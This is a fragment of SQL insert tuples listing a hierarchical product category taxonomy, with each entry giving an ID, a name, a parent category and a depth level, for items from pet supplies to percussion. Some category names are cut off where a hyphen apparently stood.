(6951,'Aquarium Overflow Boxes',6,'Fish Supplies',3),
(6952,'Potty Training',537,'Baby & Toddler',1),
(6953,'Potty Training Kits',6952,'Potty Training',2),
(6955,'Appliques & Patches',505379,'Embellishments & Trims',5),
(6956,'Cocktail Shakers',651,'Cocktail Shakers & Tools',4),
(6957,'Cocktail & Barware Tool Sets',649,'Barware',3),
(6958,'Drinkware Sets',674,'Drinkware',4),
(6960,'Bicycle Handlebar Extensions',3618,'Bicycle Parts',4),
(6962,'Mail Sorters',923,'Filing & Organization',2),
(6963,'Outdoor Furniture Accessories',436,'Furniture',1),
(6964,'Outdoor Furniture Covers',6963,'Outdoor Furniture Accessories',2),
(6965,'Hand Tool Sets',4919,'Tool Sets',3),
(6966,'Vehicle Warning Whips',2879,'Vehicle Safety Equipment',4),
(6967,'Pruning Saws',3173,'Gardening Tools',4),
(6968,'Motor Vehicle Parking Cameras',8526,'Motor Vehicle Electronics',3),
(6969,'High Chair & Booster Seat Accessories',554,'Baby & Toddler Furniture',2),
(6970,'Musical Instrument Amplifier Cabinets',8072,'Musical Instrument Amplifier Accessories',4),
(6971,'Diaper Wet Bags',548,'Diapering',2),
(6972,'Medical Reflex Hammers & Tuning Forks',3477,'Medical Equipment',3),
(6973,'Pet Steps & Ramps',2,'Pet Supplies',2),
(6974,'Sugar Dispensers',668,'Kitchen Tools & Utensils',3),
(6975,'Biochemicals',1624,'Science & Laboratory',2),
(6977,'Sunglass Lenses',1380,'Vision Care',3),
(6978,'Pet Biometric Monitors',2,'Pet Supplies',2),
(6979,'Keyboard Trays & Platforms',279,'Computer Accessories',3),
(6980,'Pet Glucose Meters',6978,'Pet Biometric Monitors',3),
(6981,'Pet Thermometers',6978,'Pet Biometric Monitors',3),
(6982,'Pet Pedometers',6978,'Pet Biometric Monitors',3),
(6983,'Pet Agility Equipment',2,'Pet Supplies',2),
(6984,'Collar Stays',167,'Clothing Accessories',2),
(6985,'Button Studs',167,'Clothing Accessories',2),
(6986,'Household Storage Caddies',636,'Storage & Organization',3),
(6987,'Material Handling',111,'Business & Industrial',1),
(6988,'Conveyors',6987,'Material Handling',2),
(6989,'Incense Making Kits',505370,'Art & Craft Kits',4),
(6990,'Livestock Feeders & Waterers',6991,'Animal Husbandry',3),
(6991,'Animal Husbandry',112,'Agriculture',2),
(6992,'Wild Game Feeders',3136,'Hunting',4),
(6993,'Bird & Wildlife Feeders',696,'Decor',2),
(6994,'Squirrel Feeders',6993,'Bird & Wildlife Feeders',3),
(6995,'Butterfly Feeders',6993,'Bird & Wildlife Feeders',3),
(6996,'Pool Brushes & Brooms',2832,'Pool & Spa Accessories',3),
(6997,'Collectible Trading Cards',216,'Collectibles',3),
(6999,'Beading Patterns',505371,'Crafting Patterns & Molds',4),
(7000,'Ice Skate Blades',3791,'Ice Skate Parts & Accessories',4),
(7001,'Diaper Pail Accessories',548,'Diapering',2),
(7002,'Contraceptive Cases',491,'Health Care',2),
(7003,'Motorcycle Pants',5517,'Motorcycle Protective Clothing',4),
(7004,'Staircases',115,'Building Materials',2),
(7006,'Portable Cooking Stove Accessories',2901,'Kitchen Appliance Accessories',3),
(7007,'Cocktail Decorations',96,'Party Supplies',3),
(7008,'Wine Glass Charms',649,'Barware',3),
(7010,'Multi',1001,'Indoor Games',2),
(7011,'Hockey Stick Parts',499915,'Figure Skating & Hockey',3),
(7012,'Hockey Stick Care',499915,'Figure Skating & Hockey',3),
(7014,'Diaper Kits',548,'Diapering',2),
(7016,'Pacifier Clips & Holders',5252,'Baby Health',2),
(7018,'Skin Care Rollers',2958,'Skin Care Tools',5),
(7019,'Paint Tool Accessories',3650,'Tool Accessories',2),
(7020,'Paint Roller Accessories',7019,'Paint Tool Accessories',3),
(7022,'Vehicle License Plate Covers',2495,'Vehicle Decor',4),
(7029,'Log Rack & Carrier Accessories',2862,'Fireplace & Wood Stove Accessories',2),
(7030,'Log Splitters',1167,'Tools',2),
(7031,'Vehicle Soft Tops',3436,'Vehicle Covers',4),
(7052,'Mailbox Enclosures',6333,'Mailbox Accessories',3),
(7053,'Wall Paneling',115,'Building Materials',2),
(7054,'Fascinators',2020,'Headwear',3),
(7055,'Hammer Handles',7056,'Hammer Accessories',3),
(7056,'Hammer Accessories',3650,'Tool Accessories',2),
(7057,'Hammer Heads',7056,'Hammer Accessories',3),
(7058,'Emergency Tools & Kits',5835,'Emergency Preparedness',2),
(7059,'Climbing',1011,'Outdoor Recreation',2),
(7060,'Ice Climbing Tools',7059,'Climbing',3),
(7061,'Ice Screws',7059,'Climbing',3),
(7062,'Rivets',500054,'Hardware Fasteners',3),
(7063,'Finger Cots',2907,'Medical Supplies',3),
(7064,'Riveting Tools',1167,'Tools',2),
(7065,'Rivet Guns',7064,'Riveting Tools',3),
(7066,'Rivet Pliers',7064,'Riveting Tools',3),
(7068,'Bassinet & Cradle Accessories',554,'Baby & Toddler Furniture',2),
(7070,'Crib & Toddler Bed Accessories',554,'Baby & Toddler Furniture',2),
(7071,'Crib Conversion Kits',7070,'Crib & Toddler Bed Accessories',3),
(7072,'Crib Bumpers & Liners',7070,'Crib & Toddler Bed Accessories',3),
(7075,'Absinthe Fountains',649,'Barware',3),
(7076,'Interfacing',505384,'Textiles',5),
(7077,'Masonry & Tile Saws',1235,'Saws',3),
(7078,'Gaiters',1933,'Shoe Accessories',2),
(7080,'Binding Machines',4312,'Binding Supplies',3),
(7081,'Jigsaw Puzzle Accessories',3867,'Puzzles',2),
(7082,'Shower Visors',4678,'Baby Bathing',2),
(7085,'Work Safety Tethers',2047,'Work Safety Protective Gear',2),
(7086,'Concrete Molds',2878,'Hardware Accessories',2),
(7087,'Air Hammer Accessories',7056,'Hammer Accessories',3),
(7088,'Disposable Serveware',135,'Food Service',2),
(7089,'Disposable Serving Trays',7088,'Disposable Serveware',3),
(7090,'Remote Control Airships & Blimps',2546,'Remote Control Toys',3),
(7091,'Hearth Pads',2862,'Fireplace & Wood Stove Accessories',2),
(7092,'Brackets & Reinforcement Braces',2878,'Hardware Accessories',2),
(7093,'Bathroom Accessory Mounts',574,'Bathroom Accessories',2),
(7096,'Needlecraft Kits',505370,'Art & Craft Kits',4),
(7097,'Special Occasion Card Boxes & Holders',96,'Party Supplies',3),
(7099,'Drum Kit Hardware',3465,'Percussion Accessories',4),
(7100,'Cymbal & Drum Cases',3465,'Percussion Accessories',4),
(7101,'Drum Pedals',7099,'Drum Kit Hardware',5),
(7102,'Drum Kit Mounting Hardware',7099,'Drum Kit Hardware',5),
(7103,'Bass Drum Beaters',7099,'Drum Kit Hardware',5),
(7104,'Child Swimming Aids',1144,'Swimming',4),
(7107,'Outdoor Umbrella Covers',6751,'Outdoor Umbrella & Sunshade Accessories',4),
(7108,'Outdoor Umbrella & Sunshade Fabric',6751,'Outdoor Umbrella & Sunshade Accessories',4),
(7109,'Fireplace Reflectors',2862,'Fireplace & Wood Stove Accessories',2),
(7110,'Heating Radiator Accessories',3348,'Household Appliance Accessories',2),
(7111,'Heating Radiator Reflectors',7110,'Heating Radiator Accessories',3),
(7112,'Molding',115,'Building Materials',2),
(7113,'Decorative Jars',696,'Decor',2),
(7114,'Bobblehead Figures',1255,'Dolls, Playsets & Toy Figures',3),
(7115,'Vehicle Gun Racks',3472,'Motor Vehicle Carrying Racks',4),
(7116,'Grappling Dummies',499720,'Boxing & Martial Arts Training Equipment',4),
(7117,'Marker & Highlighter Ink Refills',4470,'Writing & Drawing Instrument Accessories',3),
(7118,'Water Cooler Accessories',2901,'Kitchen Appliance Accessories',3),
(7119,'Water Cooler Bottles',7118,'Water Cooler Accessories',4),
(7120,'Religious Altars',97,'Religious Items',2),
(7121,'Wallpaper Steamers',604,'Household Appliances',2),
(7122,'Vehicle Bicycle Rack Accessories',6454,'Motor Vehicle Carrying Rack Accessories',4),
(7125,'Fishing Beads',7217,'Fly Tying Materials',4),
(7127,'Food Coloring',2660,'Cooking & Baking Ingredients',3),
(7128,'Mannequin Parts',138,'Retail',2),
(7129,'Punching & Training Bag Accessories',499720,'Boxing & Martial Arts Training Equipment',4),
(7130,'Shower Walls & Surrounds',2206,'Shower Parts',4),
(7131,'Baking Weights',4502,'Bakeware Accessories',4),
(7132,'One',1604,'Clothing',2),
(7133,'Hand Muffs',167,'Clothing Accessories',2),
(7134,'Enema Kits & Supplies',2915,'Personal Care',2),
(7135,'Travel Converters & Adapters',275,'Power',3),
(7136,'Wall & Ceiling Tile',115,'Building Materials',2),
(7137,'Animal & Pet Repellents',2865,'Repellents',4),
(7138,'Stair Lifts',520,'Accessibility Equipment',4),
(7139,'Foil Cutters',649,'Barware',3),
(7140,'Drill Bit Extensions',3944,'Drill & Screwdriver Accessories',3),
(7142,'Cat Litter Box Mats',4,'Cat Supplies',3),
(7143,'Pet Bowl Mats',2,'Pet Supplies',2),
(7144,'Pet Oral Care Supplies',2,'Pet Supplies',2),
(7149,'Beverage Dispensers',668,'Kitchen Tools & Utensils',3),
(7150,'Drum Stick & Brush Accessories',3465,'Percussion Accessories',4),
(7151,'Drum Stick & Brush Bags & Holders',7150,'Drum Stick & Brush Accessories',5),
(7152,'Drum Keys',3465,'Percussion Accessories',4),
(7153,'Drum Heads',3465,'Percussion Accessories',4),
(7154,'Hiking Pole Accessories',1013,'Camping & Hiking',3),
(7156,'Rounders',499713,'Athletics',2),
(7157,'Rounders Gloves',7156,'Rounders',3),
(7158,'Rounders Bats',7156,'Rounders',3),
(7159,'Breadsticks',423,'Snack Foods',3),
(7160,'Party Games',96,'Party Supplies',3),
(7163,'Speaker Accessories',1420,'Audio Accessories',3),
(7165,'Electric Griddles & Grills',730,'Kitchen Appliances',3),
(7166,'Battery Accessories',275,'Power',3),
(7167,'General Purpose Battery Chargers',7166,'Battery Accessories',4),
(7168,'Leaf Blower Accessories',4564,'Outdoor Power Equipment Accessories',3),
(7169,'Weed Trimmer Accessories',4564,'Outdoor Power Equipment Accessories',3),
(7170,'Weed Trimmer Blades & Spools',7169,'Weed Trimmer Accessories',4),
(7171,'Leaf Blower Tubes',7168,'Leaf Blower Accessories',4),
(7172,'Dreamcatchers',696,'Decor',2),
(7173,'Suncatchers',696,'Decor',2),
(7174,'Reaction Balls',990,'Exercise & Fitness',2),
(7175,'Spears',780,'Weapons',2),
(7176,'Mailbox Flags',6333,'Mailbox Accessories',3),
(7177,'Mailbox Covers',6333,'Mailbox Accessories',3),
(7178,'Watercraft Storage Racks',499811,'Boating & Water Sports',3),
(7182,'USB Adapters',258,'Adapters',3),
(7183,'Ballasts & Starters',127,'Power & Electrical Supplies',2),
(7184,'Potting Benches',5632,'Gardening Accessories',4),
(7186,'Spermicides',491,'Health Care',2),
(7187,'Ice Maker Accessories',2901,'Kitchen Appliance Accessories',3),
(7188,'Flutophones',87,'Woodwinds',4),
(7190,'Foot Files',2958,'Skin Care Tools',5),
(7191,'Baby Mobile Accessories',2847,'Baby Toys & Activity Equipment',2),
(7192,'Floral Tape',505376,'Crafting Adhesives & Magnets',5),
(7193,'Wheatgrass',5793,'Fresh & Frozen Vegetables',4),
(7196,'Couscous',431,'Grains, Rice & Cereal',3),
(7197,'Hanging Chairs',443,'Chairs',2),
(7198,'Baby Activity Toys',2847,'Baby Toys & Activity Equipment',2),
(7199,'Laser & IPL Hair Removal Devices',4507,'Hair Removal',4),
(7200,'Baby Wipe Dispensers & Warmers',548,'Diapering',2),
(7202,'Riding Toy Accessories',1253,'Toys',2),
(7206,'Decorative Bells',696,'Decor',2),
(7207,'Bra Accessories',213,'Underwear & Socks',3),
(7208,'Bra Strap Pads',7207,'Bra Accessories',4),
(7209,'Breast Petals & Concealers',7207,'Bra Accessories',4),
(7210,'Breast Enhancing Inserts',7207,'Bra Accessories',4),
(7211,'Bra Straps & Extenders',7207,'Bra Accessories',4),
(7212,'Sofa Accessories',436,'Furniture',1),
(7213,'Chair & Sofa Supports',7212,'Sofa Accessories',2),
(7214,'Furniture Floor Protectors',630,'Household Supplies',2),
(7215,'Horse Tack Accessories',1031,'Equestrian',3),
(7216,'Saddle Racks',8107,'Saddle Accessories',5),
(7217,'Fly Tying Materials',3334,'Fishing',3),
(7218,'Dry Ice Makers',4335,'Laboratory Equipment',3),
(7219,'Inflatable Bouncer Accessories',1249,'Outdoor Play Equipment',2),
(7220,'Bed Pans',491,'Health Care',2),
(7221,'Fishing Traps',3334,'Fishing',3),
(7222,'Fishing Snaps & Swivels',499823,'Fishing Tackle',4),
(7223,'Bicycle Toe Straps & Clips',3214,'Bicycle Accessories',4),
(7224,'Ski & Snowboard Bags',499845,'Skiing & Snowboarding',4),
(7225,'Restore Disks',313,'Computer Software',2),
(7226,'Fire Alarm Control Panels',1679,'Flood, Fire & Gas Safety',2),
(7227,'Heat Detectors',1679,'Flood, Fire & Gas Safety',2),
(7230,'Neck Gaiters',167,'Clothing Accessories',2),
(7231,'Cymbal & Drum Mutes',3465,'Percussion Accessories',4),
(7232,'Practice Pads',75,'Percussion',4),
(7234,'Breast Milk Storage Containers',561,'Nursing & Feeding',2),
(7235,'Food Service Uniforms',2306,'Uniforms',3),
(7238,'Coaster Holders',649,'Barware',3),
(7240,'Hairdressing & Cosmetology',111,'Business & Industrial',1),
(7241,'Salon Chairs',7240,'Hairdressing & Cosmetology',2),
(7242,'Pedicure Chairs',7240,'Hairdressing & Cosmetology',2),
(7243,'Shower Benches & Seats',5488,'Accessibility Furniture & Fixtures',4),
(7244,'Shower Stalls & Kits',1673,'Plumbing Fixtures',3),
(7245,'Outdoor Power Equipment Sets',3798,'Outdoor Power Equipment',3),
(7247,'Sushi Mats',668,'Kitchen Tools & Utensils',3),
(7248,'Chair Accessories',436,'Furniture',1),
(7249,'Ocarinas',87,'Woodwinds',4),
(7250,'Musical Pipes',87,'Woodwinds',4),
(7251,'Basketball Hoop Padding',4676,'Basketball Hoop Parts & Accessories',4),
(7252,'Off',911,'Motor Vehicle Tires',5),
(7253,'Off',2932,'Motor Vehicle Rims & Wheels',5),
(7255,'Household Storage Drawers',636,'Storage & Organization',3),
(7257,'Integrated Circuits & Chips',3991,'Semiconductors',3),
(7258,'Electronic Filters',3702,'Circuit Boards & Components',2),
(7259,'Circuit Decoders & Encoders',3702,'Circuit Boards & Components',2),
(7260,'Electronic Oscillators',3635,'Passive Circuit Components',3),
(7261,'Automation Control Components',111,'Business & Industrial',1),
(7262,'Variable Frequency & Adjustable Speed Drives',7261,'Automation Control Components',2),
(7263,'Programmable Logic Controllers',7261,'Automation Control Components',2),
(7264,'Printed Circuit Boards',3702,'Circuit Boards & Components',2),
(7265,'Hedge Trimmer Accessories',4564,'Outdoor Power Equipment Accessories',3),
(7270,'Dowel Pins & Rods',2878,'Hardware Accessories',2),
(7271,'Carpentry Jointers',1167,'Tools',2),
(7274,'Dog Kennels & Runs',5,'Dog Supplies',3),
(7275,'Electrical Motors',127,'Power & Electrical Supplies',2),
(7277,'Music Stand Accessories',55,'Musical Instrument & Orchestra Accessories',3),
(7278,'Sheet Music Clips',7277,'Music Stand Accessories',4),
(7279,'Music Stand Bags',7277,'Music Stand Accessories',4),
(7280,'Music Stand Lights',7277,'Music Stand Accessories',4),
(7281,'Traditional Leather Pants',5388,'Traditional & Ceremonial Clothing',3),
(7282,'Hand Percussion Accessories',3465,'Percussion Accessories',4),
(7283,'Hand Percussion Bags & Cases',7282,'Hand Percussion Accessories',5),
(7284,'Hand Percussion Stands & Mounts',7282,'Hand Percussion Accessories',5),
(7285,'Hand Percussion',75,'Percussion',4),
(7286,'Musical Scrapers & Ratchets',7285,'Hand Percussion',5),
(7287,'Musical Shakers',7285,'Hand Percussion',5),
(7288,'Finger & Hand Cymbals',7285,'Hand Percussion',5),
(7289,'Claves & Castanets',7285,'Hand Percussion',5),
(7290,'Musical Triangles',7285,'Hand Percussion',5),
(7291,'Musical Blocks',7285,'Hand Percussion',5),
(7293,'Musical Cowbells',7285,'Hand Percussion',5),
(7294,'Vibraslaps',7285,'Hand Percussion',5),
(7295,'Hand Drums',7285,'Hand Percussion',5),
(7303,'Bakery Boxes',135,'Food Service',2),
(7304,'Bald Caps',5192,'Costume Accessories',3),
(7305,'Wig Accessories',171,'Hair Accessories',3),
(7306,'Wig Glue & Tape',7305,'Wig Accessories',4),
(7307,'Wig Caps',7305,'Wig Accessories',4),
(7308,'Percussion Stands',3465,'Percussion Accessories',4),
(7309,'Pacifier Wipes',5252,'Baby Health',2),
(7310,'Outdoor Storage Boxes',4299,'Outdoor Furniture',2),
(7311,'Ball Pit Accessories',1253,'Toys',2),
(7312,'Ball Pit Balls',7311,'Ball Pit Accessories',3),
(7313,'Outfit Sets',1604,'Clothing',2),
(7314,'Golf Accessory Sets',1043,'Golf',3),
(7316,'PAP Masks',4551,'Respiratory Care',3),
(7317,'PAP Machines',4551,'Respiratory Care',3),
(7318,'Pet Nail Polish',6383,'Pet Grooming Supplies',3),
(7319,'Pet Nail Tools',6383,'Pet Grooming Supplies',3),
(7320,'Dry Cleaning Kits',627,'Laundry Supplies',3),
(7322,'Business Hour Signs',976,'Signage',2),
(7323,'Open & Closed Signs',976,'Signage',2),
(7324,'Tongue Depressors',2907,'Medical Supplies',3),
(7325,'Dissection Kits',1624,'Science & Laboratory',2),
(7326,'Axe Accessories',3650,'Tool Accessories',2),
(7327,'Sticky Rice Cakes',423,'Snack Foods',3),
(7328,'Duct Heaters',1626,'Climate Control Appliances',3),
(7329,'Food Steaming Bags',668,'Kitchen Tools & Utensils',3),
(7330,'All',4973,'Household Cleaning Products',4),
(7331,'Cooking Thermometer Accessories',668,'Kitchen Tools & Utensils',3),
(7332,'Outdoor Power Equipment Base Units',3798,'Outdoor Power Equipment',3),
(7333,'Outdoor Power Equipment Batteries',4564,'Outdoor Power Equipment Accessories',3),
(7334,'Hedge Trimmer Attachments',8485,'Multifunction Outdoor Power Equipment Attachments',4),
(7335,'Weed Trimmer Attachments',8485,'Multifunction Outdoor Power Equipment Attachments',4),
(7336,'HIV Tests',505293,'Medical Tests',3),
(7337,'Blood Typing Test Kits',505293,'Medical Tests',3),
(7338,'Lamp Post Bases',2956,'Lighting Accessories',2),
(7339,'Mailbox Replacement Doors',6333,'Mailbox Accessories',3),
(7340,'Embossing Heat Tools',504640,'Craft Cutting & Embossing Tools',5),
(7342,'Fishing Gaffs',3334,'Fishing',3),
(7343,'Fishing Spears',3334,'Fishing',3),
(7344,'Fishing Hook Removal Tools',3334,'Fishing',3),
(7345,'Handheld Circular Saw Accessories',6549,'Saw Accessories',3),
(7346,'Jigsaw Accessories',6549,'Saw Accessories',3),
(7347,'Mobile Phone Replacement Parts',264,'Mobile Phone Accessories',4),
(7349,'Tablet Computer Parts',285,'Computer Components',3),
(7351,'Drawer & Shelf Liners',630,'Household Supplies',2),
(7353,'Ice Bins',135,'Food Service',2),
(7354,'Starter Cultures',2660,'Cooking & Baking Ingredients',3),
(7355,'Electric Skillet & Wok Accessories',2901,'Kitchen Appliance Accessories',3),
(7356,'Double Eyelid Glue & Tape',2548,'Makeup Tools',5),
(7357,'Musical Keyboard Bags & Cases',60,'Musical Keyboard Accessories',4),
(7358,'Toilet Seat Covers',2691,'Toilet & Bidet Accessories',4),
(7360,'Baby Soothers',2847,'Baby Toys & Activity Equipment',2),
(7362,'Toner & Inkjet Cartridge Refills',5258,'Printer Consumables',4),
(7363,'Contact Lens Care Kits',3011,'Contact Lens Care',4),
(7364,'Musical Instrument Amplifier Stands',8072,'Musical Instrument Amplifier Accessories',4),
(7365,'Pizza Cutter Accessories',668,'Kitchen Tools & Utensils',3),
(7366,'Flying Toy Accessories',1253,'Toys',2),
(7368,'Kite Accessories',7366,'Flying Toy Accessories',3),
(7369,'Axe Heads',7326,'Axe Accessories',3),
(7370,'Axe Handles',7326,'Axe Accessories',3),
(7371,'Kite Line Reels & Winders',7368,'Kite Accessories',4),
(7372,'Dog Diaper Pads & Liners',5,'Dog Supplies',3),
(7373,'Hearing Enhancers',3136,'Hunting',4),
(7374,'Rye',431,'Grains, Rice & Cereal',3),
(7375,'Kite Buggying',1011,'Outdoor Recreation',2),
(7376,'Kite Buggies',7375,'Kite Buggying',3),
(7377,'Kite Buggy Accessories',7375,'Kite Buggying',3),
(7380,'Cardboard Cutouts',696,'Decor',2),
(7382,'House Numbers & Letters',696,'Decor',2),
(7383,'Poker Chip Accessories',3793,'Games',2),
(7384,'Poker Chip Carriers & Trays',7383,'Poker Chip Accessories',3),
(7385,'Bird Cage Accessories',3,'Bird Supplies',3),
(7386,'Bird Cage Food & Water Dishes',7385,'Bird Cage Accessories',4),
(7387,'Dried Vegetables',430,'Fruits & Vegetables',3),
(7393,'Spectrometers',4335,'Laboratory Equipment',3),
(7394,'Transducers',1305,'Measuring Tools & Sensors',3),
(7395,'Accelerometers',1801,'Components',2),
(7396,'Pet Sunscreen',2,'Pet Supplies',2),
(7397,'Ball Carrying Bags & Carts',499799,'General Purpose Athletic Equipment',3),
(7398,'Bird Gyms & Playstands',3,'Bird Supplies',3),
(7399,'Tiki Torches & Oil Lamps',594,'Lighting',2),
(7400,'Landscape Pathway Lighting',594,'Lighting',2),
(7401,'In',594,'Lighting',2),
(7402,'Wicks',505372,'Art & Crafting Materials',4),
(7403,'Wick Tabs',505372,'Art & Crafting Materials',4),
(7404,'Back & Lumbar Support Cushions',493,'Back Care',3),
(7406,'Moisture Absorbers',630,'Household Supplies',2),
(7407,'Dust Masks',503724,'Protective Masks',3),
(7411,'Blackjack & Craps Sets',3793,'Games',2),
(7412,'Roulette Wheels & Sets',3793,'Games',2),
(7413,'Tube Feeding Supplements',2890,'Fitness & Nutrition',3),
(7414,'Vehicle Battery Chargers',8236,'Vehicle Repair & Specialty Tools',4),
(7415,'Multimeter Accessories',5526,'Measuring Tool & Sensor Accessories',3),
(7416,'Inspection Mirrors',1167,'Tools',2),
(7417,'Powdered Hand Soap',474,'Bath & Body',4),
(7419,'Flag & Windsock Accessories',696,'Decor',2),
(7420,'Flag & Windsock Pole Lights',7419,'Flag & Windsock Accessories',3),
(7421,'Flag & Windsock Poles',7419,'Flag & Windsock Accessories',3),
(7422,'Finials',696,'Decor',2),
(7423,'Canopy Poles',6105,'Canopy & Gazebo Accessories',5),
(7424,'Canopy Weights',6105,'Canopy & Gazebo Accessories',5),
(7425,'Paddle Ball Toys',4352,'Activity Toys',3),
(7426,'Stainless Steel Cleaners & Polishes',4973,'Household Cleaning Products',4),
(7427,'Sesame Sticks',423,'Snack Foods',3),
(7428,'Dog Kennel & Run Accessories',5,'Dog Supplies',3),
(7429,'Anti',567,'Skin Care',4),
(7430,'Paddle Ball Sets',499846,'Outdoor Games',3),
(7431,'Glockenspiels & Xylophones',75,'Percussion',4),
(7433,'Ball Pump Accessories',499799,'General Purpose Athletic Equipment',3),
(7434,'Ball Pumps',499799,'General Purpose Athletic Equipment',3),
(7435,'Ball Pump Needles',7433,'Ball Pump Accessories',4),
(7436,'Mail Slots',696,'Decor',2),
(7437,'Microtomes',4335,'Laboratory Equipment',3),
(7438,'Tablet Computer Batteries',276,'Batteries',4),
(7439,'Sound Dampening Panels & Foam',115,'Building Materials',2),
(7444,'Toaster Accessories',2901,'Kitchen Appliance Accessories',3),
(7445,'Nail Polish Thinners',478,'Nail Care',4),
(7446,'Toilet Seat Lid Covers',2691,'Toilet & Bidet Accessories',4),
(7447,'Lamp Post Mounts',2956,'Lighting Accessories',2),
(7448,'Bicycle Spoke Beads',3214,'Bicycle Accessories',4),
(7449,'Boating Gloves',1120,'Boating & Rafting',4),
(7451,'Surfing Gloves',1143,'Surfing',4),
(7452,'Towed Water Sport Gloves',3195,'Towed Water Sports',4),
(7453,'Bicycle Cleat Covers',7474,'Bicycle Cleat Accessories',5),
(7455,'Electronic Drum Modules',3465,'Percussion Accessories',4),
(7457,'Garment Shields',627,'Laundry Supplies',3),
(7459,'Horse Vitamins & Supplements',3257,'Horse Care',4),
(7460,'Hunting & Shooting Protective Gear',499824,'Hunting & Shooting',3),
(7461,'Hunting & Shooting Gloves',7460,'Hunting & Shooting Protective Gear',4),
(7462,'Washing Machine Cleaners',4973,'Household Cleaning Products',4),
(7467,'Facial Cleansing Kits',567,'Skin Care',4),
(7468,'Spectrometer Accessories',4335,'Laboratory Equipment',3),
(7470,'Septic Tank & Cesspool Treatments',2277,'Chemicals',3),
(7471,'Watch Stickers & Decals',5122,'Watch Accessories',3),
(7472,'Magnetizers & Demagnetizers',3650,'Tool Accessories',2),
(7473,'Ribbon & Streamer Toys',4352,'Activity Toys',3),
(7474,'Bicycle Cleat Accessories',3982,'Cycling Apparel & Accessories',4),
(7475,'Bicycle Cleat Shims & Wedges',7474,'Bicycle Cleat Accessories',5),
(7476,'Bicycle Cleat Bolts',7474,'Bicycle Cleat Accessories',5),
(7477,'Bicycle Headsets',3618,'Bicycle Parts',4),
(7478,'Bicycle Headset Parts',3618,'Bicycle Parts',4),
(7479,'Bicycle Headset Spacers',7478,'Bicycle Headset Parts',5),
(7480,'Bicycle Headset Bearings',7478,'Bicycle Headset Parts',5),
(7481,'Horse Treats',3257,'Horse Care',4),
(7482,'Horse Feed',3257,'Horse Care',4),
(7484,'Grout Sponges',1193,'Masonry Tools',3),
(7485,'Jerky Guns',668,'Kitchen Tools & Utensils',3),
(7486,'Bitters',499676,'Alcoholic Beverages',3),
(7490,'Nail Drills',2975,'Nail Tools',5),
(7494,'Manicure & Pedicure Spacers',2975,'Nail Tools',5),
(7495,'Toe Spacers',515,'Foot Care',3),
(7496,'Pool Deck Kits',2832,'Pool & Spa Accessories',3),
(7497,'Dentistry',111,'Business & Industrial',1),
(7498,'Dental Mirrors',7499,'Dental Tools',3),
(7499,'Dental Tools',7497,'Dentistry',2),
(7500,'Dental Cement',7497,'Dentistry',2),
(7501,'Laptop Replacement Cables',4224,'Laptop Parts',4),
(7502,'Wrinkle Releasers & Anti',627,'Laundry Supplies',3),
(7503,'Deck & Fence Cleaners',2277,'Chemicals',3),
(7504,'Concrete & Masonry Cleaners',2277,'Chemicals',3),
(7506,'Cookie Decorating Kits',2660,'Cooking & Baking Ingredients',3),
(7509,'Toilet Brush Replacement Heads',574,'Bathroom Accessories',2),
(7510,'Dishwasher Cleaners',4973,'Household Cleaning Products',4),
(7514,'Hat Boxes',5558,'Clothing & Closet Storage',4),
(7515,'Band Saw Accessories',6549,'Saw Accessories',3),
(7516,'Power Tool & Equipment Manuals',5037,'Product Manuals',2),
(7517,'Small Animal Treats',5013,'Small Animal Supplies',3),
(7518,'Hunting & Shooting Jackets',7460,'Hunting & Shooting Protective Gear',4),
(7519,'Ball & Cup Games',4352,'Activity Toys',3),
(7521,'Luggage Covers',110,'Luggage Accessories',2),
(7522,'Patient Lifts',3477,'Medical Equipment',3),
(7523,'Fireplace Andirons',2862,'Fireplace & Wood Stove Accessories',2),
(7525,'Bulletin Board Accessories',966,'Display Boards',3),
(7526,'Bulletin Board Trim',7525,'Bulletin Board Accessories',4),
(7527,'Powered Hand Fans & Misters',608,'Fans',4),
(7528,'Vinegar Drinks',413,'Beverages',2),
(7530,'Computer Covers & Skins',279,'Computer Accessories',3),
(7531,'Dental Tool Sets',7499,'Dental Tools',3),
(7532,'Vehicle Magnets',2495,'Vehicle Decor',4),
(7537,'Bulb Planting Tools',3173,'Gardening Tools',4),
(7538,'Bicycle Foot Pegs',4597,'Bicycle Wheel Parts',5),
(7539,'Sleds',499844,'Winter Sports & Activities',3),
(7540,'Charcoal Chimneys',3684,'Outdoor Grill Accessories',4),
(7542,'Earplug Dispensers',506,'Ear Care',3),
(7550,'Egg Cups',4026,'Serveware',4),
(7551,'E',276,'Batteries',4),
(7552,'Rinse Aids',4973,'Household Cleaning Products',4),
(7553,'Tilt Skillets',135,'Food Service',2),
(7555,'Hand Bells & Chimes',7285,'Hand Percussion',5),
(7556,'Grease Guns',1167,'Tools',2),
(7557,'Flagging & Caution Tape',2878,'Hardware Accessories',2),
(7558,'Ski & Snowboard Storage Racks',499845,'Skiing & Snowboarding',4),
(7559,'Office Chair Accessories',503765,'Office Furniture Accessories',2),
(7561,'Sprinklers & Sprinkler Heads',3568,'Watering & Irrigation',3),
(7562,'Nippers',1180,'Cutters',3),
(7563,'Grass Edger Accessories',4564,'Outdoor Power Equipment Accessories',3),
(7564,'Grass Edger Attachments',8485,'Multifunction Outdoor Power Equipment Attachments',4),
(7565,'Bullion',1813,'Finance & Insurance',2),
(7566,'MP3 Player & Mobile Phone Accessory Sets',232,'MP3 Player Accessories',4),
(7567,'Clubs & Batons',780,'Weapons',2),
(7568,'Beer Glasses',674,'Drinkware',4),
(7569,'Beverage Chilling Cubes & Sticks',649,'Barware',3),
(7570,'Freezer Accessories',2901,'Kitchen Appliance Accessories',3),
(7789,'Skateboarding Gloves',3067,'Skateboarding Protective Gear',4),
(8006,'Kitchen Molds',668,'Kitchen Tools & Utensils',3),
(8007,'Craft Molds',505371,'Crafting Patterns & Molds',4),
(8008,'Game Controller Accessories',6475,'Input Device Accessories',4),
(8011,'Wildlife Attractants',3136,'Hunting',4),
(8012,'Kitchen Utensil Holders & Racks',2948,'Kitchen Organizers',4),
(8015,'Laminating Film, Pouches & Sheets',932,'General Office Supplies',2),
(8016,'Hand Dryer Accessories',574,'Bathroom Accessories',2),
(8017,'Costume Accessory Sets',5192,'Costume Accessories',3),
(8018,'Pretend Jewelry',5192,'Costume Accessories',3),
(8020,'Outdoor Umbrella Lights',6751,'Outdoor Umbrella & Sunshade Accessories',4),
(8021,'Paper & Magnetic Dolls',1255,'Dolls, Playsets & Toy Figures',3),
(8022,'Document Templates',5032,'Digital Goods & Currency',2),
(8023,'Shelving Accessories',436,'Furniture',1),
(8024,'Replacement Shelves',8023,'Shelving Accessories',2),
(8025,'Industrial Storage Accessories',111,'Business & Industrial',1),
(8026,'Scalpels',230913,'Medical Instruments',3),
